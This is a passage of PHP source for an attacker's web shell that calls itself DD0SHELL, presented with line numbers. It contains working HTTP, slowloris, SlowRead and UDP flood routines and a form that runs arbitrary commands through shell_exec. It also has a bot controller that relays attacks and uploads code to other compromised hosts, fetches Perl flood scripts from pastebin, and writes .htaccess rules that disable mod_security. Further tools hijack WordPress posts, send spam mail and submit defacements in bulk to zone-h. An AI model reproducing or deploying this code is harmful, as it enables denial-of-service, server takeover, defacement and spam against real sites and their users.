  790. if (@fwrite($fs[$i], $out)) {
  791. continue;
  792. } else {
  793. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  794. }
  795. }
  796. }
  797. script();
  798. }
  799.  
  800. if(isset($_POST['dohost']) && isset($_POST['time'])){
  801. $timei = time();
  802. $host = $_POST['dohost'];
  803. $time = $_POST['time'];
  804. $i = 0;
  805. for ($i = 0; $i < 100; $i++) {
  806. $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
  807. }
  808. while ((time() - $timei < $time)) {
  809. for ($i = 0; $i < 100; $i++) {
  810. $out = "POST / HTTP/1.1\r\n";
  811. $out .= "Host: {$host}\r\n";
  812. $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
  813. $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
  814. $out .= "X-a: " . rand(1, 10000) . "\r\n";
  815. if (@fwrite($fs[$i], $out)) {
  816. continue;
  817. } else {
  818. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  819. }
  820. }
  821. }
  822. script();
  823. }
  824.  
  825. if($_POST['dos'] == 'udp'){
  826. $pack = 0;
  827. $host = $_POST['ip'];
  828. $exec = $_POST['time'];
  829. $time = time();
  830. $max = $time+$exec;
  831. for($i=06555; $i <6555; $i++) {
  832. $mess .='x';
  833. }
  834. while (1) {
  835. $pack++;
  836. if(time() > $max){
  837. break;
  838. }
  839. $port = 53;
  840. $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
  841. if($fp){
  842. fwrite($fp, $mess);
  843. fclose($fp);
  844. }
  845. }
  846. script();
  847. }
  848.  
  849. if(isset($_POST['ip1']) && isset($_POST['time1'])){
  850. $pack = 0;
  851. $host = $_POST['ip1'];
  852. $exec = $_POST['time1'];
  853. $time = time();
  854. $max = $time+$exec;
  855. for($i=06555; $i <6555; $i++) {
  856. $mess .='x';
  857. }
  858. while (1) {
  859. $pack++;
  860. if(time() > $max){
  861. break;
  862. }
  863. $port = 53;
  864. $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
  865. if($fp){
  866. fwrite($fp, $mess);
  867. fclose($fp);
  868. }
  869. }
  870. script();
  871. }
  872.  
  873.  
  874. if(isset($_POST['server1'])){
  875. $server = $_POST['server1'];
  876. $host = $_POST['host1'];
  877. $request = "POST /".md5(rand())." HTTP/1.1\r\n";
  878. $request .= "Host: $host\r\n";
  879. $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
  880. $request .= "Keep-Alive: 900\r\n";
  881. $request .= "Content-Length: 1000000000\r\n";
  882. $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
  883. $request .= "Accept: *.*\r\n";
  884. $sockfd = @fsockopen($server, 80, $errno, $errstr);
  885. @fwrite($sockfd, $request);
  886. while (true){
  887. if (@fwrite($sockfd, ".") !== FALSE){
  888. echo ".";
  889. sleep(1);
  890. }else{
  891. $sockfd = @fsockopen($server, 80, $errno, $errstr);
  892. @fwrite($sockfd, $request);
  893. }
  894. }
  895. }
  896.  
  897. if($_POST['dos'] == 'SlowRead'){
  898. $host = $_POST['ip'];
  899. $port = 80;
  900. $time = $_POST['time'];
  901. $headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
  902. $timei = time();
  903. $fs = array();
  904. while (time() - $timei < $time) {
  905. for ($i = 0; $i < 100; $i++){
  906. $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
  907. fwrite($fs[$i], $headers);
  908. }
  909. while (time() - $timei < $time) {
  910. for ($i = 0; $i < count($fs); $i++) {
  911. if (!$fs[$i]){
  912. $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
  913. fwrite($fs[$i], $headers);
  914. }
  915. fread($fs[$i], 1);
  916. }
  917. sleep(mt_rand(0.5, 2));
  918. }
  919. script();
  920. }
  921. }
  922.  
  923. $host = $_POST['ipslow'];
  924. $port = 80;
  925. $time = $_POST['time'];
  926. $headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
  927. $timei = time();
  928. $fs = array();
  929. while (time() - $timei < $time) {
  930. for ($i = 0; $i < 100; $i++){
  931. $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
  932. fwrite($fs[$i], $headers);
  933. }
  934. while (time() - $timei < $time) {
  935. for ($i = 0; $i < count($fs); $i++) {
  936. if (!$fs[$i]){
  937. $fs[$i] = @fsockopen($host, $port, $errno, $errstr);
  938. fwrite($fs[$i], $headers);
  939. }
  940. fread($fs[$i], 1);
  941. }
  942. sleep(mt_rand(0.5, 2));
  943. }
  944. script();
  945. }
  946.  
  947.  
  948. $timei = time();
  949. $host = $_POST['host'];
  950. $port = $_POST['port'];
  951. $time = $_POST['time'];
  952. $max = $time + $timei;
  953. while (1) {
  954. $pack++;
  955. if(time() > $max){
  956. break;
  957. }
  958. $fp = fsockopen($host, $port, $dummy, $dummy, 1);
  959. fclose($fp);
  960. }
  961.  
  962. if(isset($_POST['server']) && isset($_POST['mhtd'])){
  963. $host = $_POST['host'];
  964. $server = $_POST['server'];
  965. $mthd = $_POST['mthd'];
  966. $port = 80;
  967. $time = 7;
  968. $timei = time();
  969. $fs = array();
  970. $request = "$mthd / HTTP/1.1\r\n";
  971. $request .= "Host: $host\r\n";
  972. $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
  973. $request .= "Keep-Alive: 900\r\n";
  974. $request .= "Content-Length: " . rand(10000, 1000000) . "\r\n";
  975. $request .= "Accept: *.*\r\n";
  976. $timei = time();
  977. for ($i = 0; $i < 100; $i++) {
  978. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  979. }
  980. while ((time() - $timei < $time)) {
  981. for ($i = 0; $i < 100; $i++) {
  982. if (@fwrite($fs[$i], $request)) {
  983. continue;
  984. } else {
  985. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  986. }
  987. }
  988. }
  989. }
  990.  
  991. function ddospingpanel(){
  992. $a = $_POST['iping'];
  993. echo ping($a, 80, 10);
  994. script();
  995. }
  996.  
  997. if(isset($_POST['ip11']) && isset($_POST['time11'])){
  998. $timei = time();
  999. $host = $_POST['ip11'];
  1000. $time = $_POST['time11'];
  1001. $i = 0;
  1002. for ($i = 0; $i < 100; $i++) {
  1003. $fs[$i] = @fsockopen($host, 80, $errno, $errstr);
  1004. }
  1005. while ((time() - $timei < $time)) {
  1006. for ($i = 0; $i < 100; $i++) {
  1007. $out = "POST / HTTP/1.1\r\n";
  1008. $out .= "Host: {$host}\r\n";
  1009. $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
  1010. $out .= "Content-Length: " . rand(1, 1000) . "\r\n";
  1011. $out .= "X-a: " . rand(1, 10000) . "\r\n";
  1012. if (@fwrite($fs[$i], $out)) {
  1013. continue;
  1014. } else {
  1015. $fs[$i] = @fsockopen($server, 80, $errno, $errstr);
  1016. }
  1017. }
  1018. }
  1019. }
  1020.  
  1021. if(isset($_POST['ip'])){
  1022. $host = $_POST['ip'];
  1023. $pps = 5000;
  1024. $tune = 125;
  1025. $uslp = (1000000 / $pps) - $tune;
  1026. if($uslp < 0)
  1027. $uslp = 0;
  1028. for ($i=6500000; $i > 0 ; $i--) {
  1029. $port = rand(1025, 65535);
  1030. $fp = fsockopen('udp://'.$host,$port,$errno,$errstr,5);
  1031. fwrite($fp, $i);
  1032. fclose($fp);
  1033. usleep($uslp);
  1034. }
  1035. }
  1036.  
  1037. // --------------------------------------------------------------------------------------------------------------------------------------------------------------
  1038.  
  1039. function Readfile1(){
  1040. shape();
  1041.  
  1042. print '<center><form method="post">
  1043. <input type="text" placeholder="command" name="exe">
  1044. <input type="submit" value="Run" name="button119"></form></center>';
  1045.  
  1046. echo "[#] Uname: ".php_uname()."<br/><br/>";
  1047. backconnect();
  1048.  
  1049. if (isset($_POST['button119'])){
  1050. $cmd = $_POST['exe'];
  1051. echo "<pre>".shell_exec($cmd)."</pre>";
  1052. }
  1053. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  1054.  
  1055. echo "[#] Directory: ".$_SERVER['DOCUMENT_ROOT']."<br/><br/>";
  1056.  
  1057. print '<font color="A9A9A9">Enter a link to the shell to check whether it is online<br/><br/></font>';
  1058. print'<div align="left"><form action="" method="POST">
  1059. <input type="text" name="sites" placeholder="site">
  1060. <input type="submit" value="Go "name="subms">
  1061. </form></div>';
  1062.  
  1063. if (isset($_POST['subms'])) {
  1064. $url = new DOMDocument();
  1065. $url->loadHTMLFile($_POST['sites']);
  1066. $url->saveHTML();
  1067.  
  1068. if (stristr($url->saveHTML(), 'DD0SHELL')) {
  1069. $a =$_SESSION["count"]++;
  1070. }
  1071. array_push($as, $_POST['sites']);
  1072. foreach($as as $val){
  1073. $_SESSION['checkbox'][] = $val;
  1074. }
  1075. }
  1076. print '<style> .leftstr, .rightstr { float: left; width: 50%; } .rightstr { text-align: right; } </style> <body>
  1077. <p class="leftstr">DD0SHELL online: </p>
  1078. <p class="rightstr">'.$a.'</p>
  1079. <p style="clear: left"></div>
  1080. </body>';
  1081.  
  1082.  
  1083. print '<center><font color="A9A9A9">Resolve host to ip address<br/><br/></font><form method="POST">
  1084. <input type="text" name="address" placeholder="address">
  1085. <input type="submit" name="go55" value="Resolve "></form></center>';
  1086. if(isset($_POST['go55'])){
  1087. $result = gethostbyname($_POST['address']);
  1088. echo '<center>'.$result.'</center><br/>';
  1089. }
  1090.  
  1091. print '<center><font color="#000000 ">Ddos &#8734;<br/><br/></font></center>';
  1092. print '<center><font color="#000000 ">
  1093. By clicking on the link or typing in the url instead of parentheses, specify the IP address of the target<br/><br/></font>';
  1094. print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos&ip=[]&time=3"."</a></font>&nbsp&nbsp&nbsp";
  1095. print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos2&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos2&ip=[]&time=3"."</a></font>&nbsp&nbsp&nbsp";
  1096. print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos3&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos3&ip=[]&time=3"."</a></font>&nbsp&nbsp&nbsp";
  1097. print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos4&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos4&ip=[]&time=3"."</a></font>&nbsp&nbsp&nbsp";
  1098. print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=ddos5&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=ddos5&ip=[]&time=3"."</a></font>&nbsp&nbsp&nbsp";
  1099. print"<font color='A9A9A9'><a style='text-decoration: none;' href=".$_SERVER['PHP_SELF']."?action=doSlow&ip=[]&time=3>".$_SERVER['PHP_SELF']."?action=doSlow&ip=[]&time=3"."</a></font>&nbsp&nbsp&nbsp";
  1100. print"?action=ddosintel&ip=[]>&nbsp&nbsp&nbsp";
  1101. print"?action=attack_http&ip=[]&host=[]&mthd=[]>&nbsp&nbsp&nbsp<br/><br/><br/></center>";
  1102.  
  1103. but();
  1104.  
  1105. print'<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><center><font color="A9A9A9">Send bot command<br/><br/></font></center>';
  1106. print'<center><form method="post">
  1107. <select name="dos">
  1108. <option value="udp">UDP</option>
  1109. <option value="SlowRead">SlowRead</option>
  1110. <option value="d">doSlow</option>
  1111. <option value="tcp">TCP</option>
  1112. </select>
  1113. <input type="text" name="ip" placeholder="ip">
  1114. <input type="text" name="time" placeholder="time">
  1115. <input type="text" name="exploit" placeholder="Address where the bot is located">
  1116. <input type="submit" name="send" value="Send"/>
  1117. </form>
  1118. </center>';
  1119. $d = $_POST['ip'];
  1120. $f = $_POST['time'];
  1121. $g = $_POST['dos'];
  1122. $paramsArray = array(
  1123. 'ip' => $d,
  1124. 'time' => $f,
  1125. 'dos' => $g
  1126. );
  1127. $vars = http_build_query($paramsArray);
  1128. $options = array(
  1129. 'http' => array(
  1130. 'method' => 'POST',
  1131. 'header' => 'Content-type: application/x-www-form-urlencoded',
  1132. 'content' => $vars,
  1133. )
  1134. );
  1135. $context = stream_context_create($options);
  1136. $result = file_get_contents($_POST['exploit'], false, $context);
  1137.  
  1138. print '<center><font color="A9A9A9">Remote upload of files<br/><br/></font></center>';
  1139.  
  1140. print'<center><form method="POST">
  1141. <input type="text" name="f" placeholder="code">
  1142. <input type="text" name="exploit" placeholder="Address where the bot is located">
  1143. <input type="submit" name="send1" value="Send"/>
  1144. </form></center>';
  1145.  
  1146. $d = $_POST['f'];
  1147. $paramsArray = array(
  1148. 'f' => $d
  1149. );
  1150. $vars = http_build_query($paramsArray);
  1151. $options = array(
  1152. 'http' => array(
  1153. 'method' => 'POST',
  1154. 'header' => 'Content-type: application/x-www-form-urlencoded',
  1155. 'content' => $vars,
  1156. )
  1157. );
  1158. $context = stream_context_create($options);
  1159. $result = file_get_contents($_POST['exploit'], false, $context);
  1160.  
  1161.  
  1162.  
  1163. print '<center><font color="A9A9A9">Perl dos script<br/><br/></font></center>';
  1164. print '<center><font color="A9A9A9">Download -> edit -> start<br/><br/></font></center>';
  1165. print '<center><font color="A9A9A9">backconnect<br/><br/></font></center>';
  1166. print '<center><font color="A9A9A9">$ perl file.pl 192.168.1.102 6666 192.168.1.1 80<br/><br/></font></center>';
  1167. print '<center><form method="post">
  1168. <select name="dos1">
  1169. <option value="pl1">ddos.pl</option>
  1170. <option value="pl2">synflood.pl</option>
  1171. <option value="pl3">udpflood.pl</option>
  1172. </select>
  1173. <input type="submit" name="pld" value="download">
  1174. </form>
  1175. </center>';
  1176. if(isset($_POST['pld'])){
  1177. if($_POST['dos1'] == 'pl1'){
  1178. $a = file_get_contents('http://pastebin.com/raw/VUEbr3k4');
  1179. $f = fopen('func.pl', 'w');
  1180. fwrite($f, $a);
  1181. fclose($f);
  1182. }
  1183. if($_POST['dos1'] == 'pl2'){
  1184. $a = file_get_contents('http://pastebin.com/raw/XjcfST6c');
  1185. $f = fopen('cmd.pl', 'w');
  1186. fwrite($f, $a);
  1187. fclose($f);
  1188. }
  1189. if($_POST['dos1'] == 'pl3'){
  1190. $a = file_get_contents('http://pastebin.com/raw/x9V70A06');
  1191. $f = fopen('udp.pl', 'w');
  1192. fwrite($f, $a);
  1193. fclose($f);
  1194. }
  1195. }
  1196.  
  1197. if(isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message'])){
  1198. mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']);
  1199. }
  1200. print'<center><font color="A9A9A9">Spam<br/><br/></font></center>';
  1201. print'<center><form method="GET">
  1202. <input type="hidden" name="mail" />
  1203. From:<br/>
  1204. <input class="cmd" name="from" value=""/><br/>
  1205. To:<br/>
  1206. <input class="cmd" name="to" value=""/><br/>
  1207. Subject:<br/>
  1208. <input type="text" class="cmd" name="subject" /><br/>
  1209. <textarea name="message" cols="178" rows="10" class="cmd" placeholder="link"></textarea><br/>
  1210. <input type="submit" class="own" value="Send!"/>
  1211. </form></center>';
  1212.  
  1213. $name = scandir('.');
  1214. echo '<table width="100%" cellpadding="5" border="1" bordercolor="Grey">';
  1215. for($i=2; $i<=(sizeof($name)-1); $i++) {
  1216. echo "<style> tbody tr:hover { background: #A9A9A9; color: #fff; } a {text-decoration: none;}a:hover { text-decoration: none; color: #C0C0C0; }</style><tr><td><body link='black' vlink='#000000'><form method='post'><input type='checkbox' name='formWheelchair[]' value='$name[$i]' /><a href='".$dir.$name[$i]."'>".$name[$i]."</a></body>"."</td><td>".filesize($name[$i]).' byte </td><td>'.perms($name[$i])."</td><td>".date("F d Y H:i:s.",filemtime($name[$i]))."</td><td><a href='$name[$i]' download>download</a></td></tr>"; }
  1217. echo "</table><br/>";
  1218. print'<form action="" method="post">
  1219. <input type="submit" name="formSubmit" value="Delete" />
  1220. <input type="submit" name="formSubmit1" value="Zip"/><br/>
  1221. </form>';
  1222. if(isset($_POST['formSubmit'])){ $aDoor = $_POST['formWheelchair']; $N = count($aDoor); for($i = 0; $i < $N; $i++) { unlink($aDoor[$i]); } }
  1223.  
  1224. else if(isset($_POST['formSubmit1'])){ $aDoor = $_POST['formWheelchair']; $N = count($aDoor); for($i = 0; $i < $N; $i++) { $aDoor = $_POST['formWheelchair']; $N = count($aDoor); for($i = 0; $i < $N; $i++) {
  1225. $testzip = 'test.zip';
  1226. $zip = new ZipArchive;
  1227. if (true === $zip->open($testzip, ZIPARCHIVE::CREATE)) {
  1228. $zip->addFile($aDoor[$i], 'newname.php');
  1229. $zip->addEmptyDir('dir3');
  1230. $zip->addFile(__FILE__, 'dir3/' . pathinfo(__FILE__, PATHINFO_FILENAME));
  1231. $zip->close();
  1232. } else echo 'No' . $testzip; }}}
  1233.  
  1234. echo "\n--------------------------------------------------------------------------------------------------------------------------------------------"."<br/>";
  1235.  
  1236. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  1237.  
  1238. print '<form method="POST">
  1239. <input name="php" placeholder="File">
  1240. <input type="submit" name="php1" value="Read">
  1241. </form>'."<br/>";
  1242. print'<form action="" method="post">
  1243. <textarea cols="100" rows="10" name="memo">';$a=file_get_contents($_POST["php"],"a+"); echo $a; file_put_contents($_GET['php'], $_GET['php1'],FILE_APPEND); print '</textarea>'."<br/><br/>";
  1244.  
  1245. print '<form method="POST">
  1246. <input type="text" name = "dir1" value="'.$_SERVER['DOCUMENT_ROOT'].'">
  1247. <input type="submit" name="GO2" value="Go">'."<br/><br/>";
  1248.  
  1249. if (isset($_POST['GO2'])){
  1250. $spisok = '';
  1251. $dir = $_POST['dir1'];
  1252. $f1 = scandir($dir,1);
  1253. foreach ($f1 as $value) {
  1254. $spisok .= $value."<br/>";
  1255. }
  1256. echo "\n--------------------------------------------------------------------------------------------------------------------------------------------"."<br/>";
  1257. echo $spisok;
  1258. echo "\n--------------------------------------------------------------------------------------------------------------------------------------------"."<br/>";}
  1259. print '<form method="POST">
  1260. <input type="text" name = "New1" placeholder="NewFile">
  1261. <input type="text" name = "New2" placeholder="a,r,w">
  1262. <input type="submit" name="GO3" value="Go">'."<br/><br/>";
  1263.  
  1264. if (isset($_POST['GO3'])){
  1265. $f = fopen($_POST['New1'], $_POST['New2']);
  1266. fclose($f);
  1267. }
  1268.  
  1269. print '<form method="POST">
  1270. <input type="text" name="dl" placeholder="File">
  1271. <input type="text" name="rm" placeholder="Dir">
  1272. <input type="submit" name="run" value="Delete">
  1273. </form>'."<br/><br/>";
  1274.  
  1275. if (isset($_POST['run'])){
  1276. unlink($_POST['dl']);
  1277. rmdir($_POST['rm']);
  1278. }
  1279.  
  1280.  
  1281. print '<form method="POST">
  1282. <input type="text" name="dir2" placeholder="New">
  1283. <input type="submit" name="run3" value="NewDir">
  1284. </form>'."<br/>";
  1285.  
  1286. if (isset($_POST['run3'])){
  1287. mkdir($_POST['dir2'], 0700);
  1288. }
  1289. print '<form method="POST">
  1290. <input type="text" name="myzip" placeholder="Zip">
  1291. <input type="text" name="zip" placeholder="File">
  1292. <input type="submit" name="zip1" value="Go">
  1293. </form>'."<br/>";
  1294.  
  1295. if (isset($_POST['zip1'])){
  1296. $testzip = $_POST['myzip'];
  1297. $zip = new ZipArchive;
  1298. if (true === $zip->open($testzip, ZIPARCHIVE::CREATE)) {
  1299. $zip->addFile($_POST['zip'], 'newname.php');
  1300. $zip->addEmptyDir('dir3');
  1301. $zip->addFile(__FILE__, 'dir3/' . pathinfo(__FILE__, PATHINFO_FILENAME));
  1302. $zip->close();
  1303. } else echo 'No' . $testzip;
  1304. }
  1305. print '<form method="POST">
  1306. <input type="text" name="my" placeholder="File">
  1307. <input type="text" name="copy" placeholder="File2">
  1308. <input type="submit" name="run1" value="Copy">
  1309. </form>'."<br/>";
  1310. if (isset($_POST['run1'])){
  1311. copy($_POST['my'],$_POST['copy']);
  1312. }
  1313.  
  1314. print '<form method="POST">
  1315. <input type="text" name="ren1" placeholder="Old">
  1316. <input type="text" name="ren2" placeholder="New">
  1317. <input type="submit" name="run2" value="Rename">
  1318. </form>'."<br/>";
  1319.  
  1320. if (isset($_POST['run2'])){
  1321. rename($_POST['ren1'], $_POST['ren2']);
  1322. }
  1323.  
  1324. print '<form method="POST">
  1325. <input type="text" name="file" placeholder="File">
  1326. -
  1327. <input type="text" name="time" placeholder="time">
  1328. <input type="submit" name="touch" value="Touch">
  1329. </form>'."<br/>";
  1330. if(isset($_POST['touch'])){ $time = time()-$_POST['time']; touch($_POST['file'],$time); }
  1331.  
  1332. print'<form method="post" enctype="multipart/form-data">
  1333. <input type="file" name="filename">
  1334. <input type="text" name="dir" value='.$_SERVER['DOCUMENT_ROOT'].'>
  1335. <input type="submit" value="upload"><br><br/>
  1336. </form>';
  1337. $uploaddir = $_POST['dir'];
  1338. $uploadfile = $uploaddir . basename($_FILES['filename']['name']);
  1339. move_uploaded_file($_FILES['filename']['tmp_name'], $uploadfile);
  1340.  
  1341. print '<form method="POST">
  1342. <input type="submit" name="del" value="KiLL"><br/>';
  1343. if(isset($_POST['del'])){
  1344. unlink(__FILE__);
  1345. cmdexec('kill -9 $$;');
  1346. unlink('a.out');
  1347. unlink('whitecat.c');
  1348. unlink('w.txt');
  1349. }
  1350. }
  1351.  
  1352. function scannport(){
  1353. shape1();
  1354. print'<center><form method="POST">
  1355. <input type="text" name="hostscan">
  1356. <input type="submit" name="scan" value="Scan">
  1357. </form></center>';
  1358.  
  1359. if (isset($_POST['scan'])){
  1360. $host = $_POST['hostscan'];
  1361. $ports = array(21,25,80,82,110,121,143,443,444,587,3306);
  1362. foreach ($ports as $port) {
  1363. $connect = @fsockopen($host,$port,$errno,$errstr,2);
  1364. if (is_resource($connect)){
  1365. echo '<h2 style="color:#ff0000"><center>'.$host.':'.$port.' '.getservbyport($port, 'tcp').' open'.'</center></h2>'."\n";
  1366. fclose($connect);
  1367. }
  1368. else{
  1369. echo '<h2 style="color:#ff0000"><center>'.$host.':'.$port.' close'.'</center></h2>'."\n";
  1370. }
  1371. }
  1372. }
  1373. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  1374. }
  1375.  
  1376. function file_search($path, $filename) {
  1377. if(($dir = opendir($path)) == FALSE)
  1378. return '';
  1379. $link = '';
  1380. while(($fp = readdir($dir)) !== FALSE) {
  1381. $link = $path . '/' . $fp;
  1382. if(is_file($link)) {
  1383. if($fp == $filename) {
  1384. closedir($dir);
  1385. return $link;
  1386. }
  1387. }else if(! ereg('^[\.]{1,2}$', $fp) && is_dir($link)) {
  1388. if(($link = file_search($link, $filename)) != '') {
  1389. closedir($dir);
  1390. return $link;
  1391. }
  1392. }
  1393. }
  1394. closedir($dir);
  1395. return '';
  1396. }
  1397.  
  1398. function disable1(){
  1399. shape();
  1400. print '<center><form method="POST">
  1401. <input type="text" name="Malware" value="'.$_SERVER['DOCUMENT_ROOT'].'">
  1402. <input type="text" name="file" placeholder="File">
  1403. <input type="submit" name="Run" value="Run">
  1404. <input type="submit" name="off" value="OFF mod_security">
  1405. </form></center>';
  1406. if(isset($_POST['file'])){
  1407. $x = file_search($_GET['file'], '.htaccess');
  1408. if($x){
  1409. echo '<center><h2><font color="red">Disable</font></h2></center>';
  1410. $f = fopen($x, 'w');
  1411. fwrite($f, 'AddHandler cgi-script .izo');
  1412. fclose($f);
  1413. }
  1414. }
  1415. print '<center><form method="POST">
  1416. <input type="text" name="direc" value="'.$_SERVER['DOCUMENT_ROOT'].'">
  1417. <input type="text" name="file" placeholder="File">
  1418. <input type="submit" name="Run" value="Search">
  1419. </form></center>';
  1420. if(isset($_POST['Run'])){ $x = file_search($_POST['direc'], $_POST['file']); if($x){print'<form action="">
  1421. <textarea cols="100" rows="10" name="memo">'; echo file_get_contents($_POST['file']); print'</textarea>';} }
  1422. if(isset($_POST['Run'])){ $x = file_search($_POST['Malware'], '.htaccess'); $f = fopen('404.html', 'w'); fwrite($f, 'Faric'); fclose($f); if($x){$f = fopen($x, 'a+'); fwrite($f, "\nErrorDocument 404 /404.html"); fclose($f); echo '<center><h2><font color="red">Disable</font></h2></center>'; }else{ $f = fopen('.htaccess','w'); fwrite($f, "\nErrorDocument 404 /404.html"); fclose($f); } }
  1423. if(isset($_POST['off'])){$x = file_search($_POST['Malware'], '.htaccess'); if($x){$f = fopen($x, 'a+'); fwrite($f, "\n<IfModule mod_security.c>
  1424. SecFilterEngine Off
  1425. SecFilterScanPOST Off
  1426. </IfModule>");
  1427. fclose($f); echo '<center><h2><font color="red">Disable</font></h2></center>'; } }
  1428. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  1429. $a = header("Location: ");
  1430. }
  1431.  
  1432. function word(){
  1433. shape();
  1434. echo '<form method="POST">
  1435. <p align="center">
  1436. <img border="0" src="http://oi59.tinypic.com/33uucdu.jpg"></p>
  1437. <center><font color="red" size="6" face="impact">Wordpress Index Hijack Priv8</font></center>
  1438. <center><font color="red" size="2" face="orion">Coded By Mauritania Attacker</font></center>
  1439. <center><input type="text" value="localhost" name="pghost">
  1440. <input type="text" value="database_name" name="dbnmn">
  1441. <input type="text" value="prefix" name="prefix">
  1442. <input type="text" value="username_db" name="dbusrrrr">
  1443. <input type="text" value="password_db" name="pwddbbn"></center><br>
  1444. <center><textarea name="pown" cols="85" rows="10"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw.php?i=WG1zASMG"></textarea><br>
  1445. <input type="submit" name="up2" value="Hijack Index"><br></center><form>';
  1446.  
  1447. $pghost = $_POST['pghost'];
  1448. $dbnmn = $_POST['dbnmn'];
  1449. $dbusrrrr = $_POST['dbusrrrr'];
  1450. $pwddbbn = $_POST['pwddbbn'];
  1451. $index = stripslashes($_POST['pown']);
  1452. $prefix = $_POST['prefix'];
  1453. if ($_POST['up2']) {
  1454. @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
  1455. @mysql_select_db($dbnmn) or die(mysql_error());
  1456. $tableName = $prefix . "posts";
  1457. $ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
  1458. if (!$ghost1) {
  1459. $ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
  1460. } elseif (!$ghost2) {
  1461. $ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
  1462. }
  1463. mysql_close();
  1464. if ($ghost1 || $ghost2 || $ghost3) {
  1465. echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
  1466. } else {
  1467. echo "<center><p><b><font color='red'>Failed To Hijack the Website :(</font></p></b></center>";
  1468. }
  1469. }
  1470. print '<div class="layer1"><hr align="center" width="1350" size="2" color="#A9A9A9" /></div>';
  1471. }
  1472.  
  1473. function mass_shell(){
  1474. shape();
  1475. print'<center>
  1476. <form method="POST">
  1477. Hacker Name : <input type="text" name="defacer" size="32" style="border: solid 1px red">&nbsp&nbsp&nbspMirror :
  1478. <select style="border: solid 1px red" name="mirror">
  1479. <option>zone-h</option>
  1480. <option>dark-h</option>
  1481. <option>aljyyosh.org</option>
  1482. </select><br>
  1483. Domains :<br><textarea style="width: 678px; height: 302px;border: solid 1px red" name="domains"></textarea><br>
  1484. <input type="submit" value="Send" name="go">
  1485. </form></center>
  1486. <br><center><font face="Agency FB" size="3px">';
  1487. set_time_limit (0);
  1488. if (!function_exists ("curl_init")){die ("This Script uses cURL Library, you must install first !<br><a href='http://au2.php.net/manual/en/curl.setup.php'>http://au2.php.net/manual/en/curl.setup.php</a>");}
  1489. if (@$_POST['go']){
  1490. foreach (explode ("\n", $_POST['domains']) as $domain)
  1491. {
  1492. post ($domain, $_POST['defacer'], $_POST['mirror']);
  1493. }
  1494. echo "<br><br><a target='_blank' href='http://zone-h.com/archive/published=0'>Zone-h</a><br>";
  1495. echo "<a target='_blank' href='http://dark-h.org/onhold/?s=1'>Dark-h</a><br>";
  1496. echo "<a target='_blank' href='http://aljyyosh.org/onhold.php'>Aljyyosh.org</a>";
  1497. }
  1498.  
  1499. function post ($url, $defacer, $mirror)
  1500. {
  1501. $ch = curl_init ();
  1502. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  1503. curl_setopt ($ch, CURLOPT_POST, 1);
  1504.  
  1505. switch ($mirror)
  1506. {
  1507. case "zone-h";
  1508. curl_setopt ($ch, CURLOPT_URL, "http://www.zone-h.com/notify/single");
  1509. curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&hackmode=1&reason=1");
  1510. if (preg_match ("/color=\"red\">OK<\/font><\/li>/", curl_exec ($ch)))
  1511. echo "$url.&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
  1512. else
  1513. echo "$url&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<span style='color: red'>Error</span><br>";
  1514. break;
  1515. case "dark-h";
